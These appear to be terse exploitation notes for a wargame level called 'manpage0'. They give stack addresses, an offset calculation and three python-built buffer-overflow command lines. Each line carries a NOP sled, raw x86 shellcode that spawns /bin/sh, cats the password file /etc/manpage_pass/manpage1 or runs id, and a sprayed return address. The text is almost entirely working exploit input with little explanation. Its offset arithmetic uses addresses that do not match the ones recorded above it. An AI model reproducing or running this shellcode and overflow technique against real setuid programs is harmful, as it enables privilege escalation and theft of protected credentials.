ret address location: 
0xffffd67c


argv[1] start:
0xffffd639


bytes before ret:
0xf6ffe0ec-0xf6ffdf70= 380

/bin/sh
./manpage0 $(python -c'print "A"*30 + "\x90"*77 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80\x90\x90" + "\x60\xd6\xff\xff"*100')

/bin/cat /etc/manpage_pass/manpage1
./manpage0 $(python -c'print "A"*30 + "\x90"*41 + "\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x61\x67\x65\x31\x68\x6d\x61\x6e\x70\x68\x73\x73\x2f\x2f\x68\x65\x5f\x70\x61\x68\x6e\x70\x61\x67\x68\x2f\x2f\x6d\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80" + "\x60\xd6\xff\xff"*100')

/bin/id
./manpage0 $(python -c'print "A"*30 + "\x90"*74 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x69\x64\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x53\x89\xe1\xcd\x80" +  "\x60\xd6\xff\xff"*100')



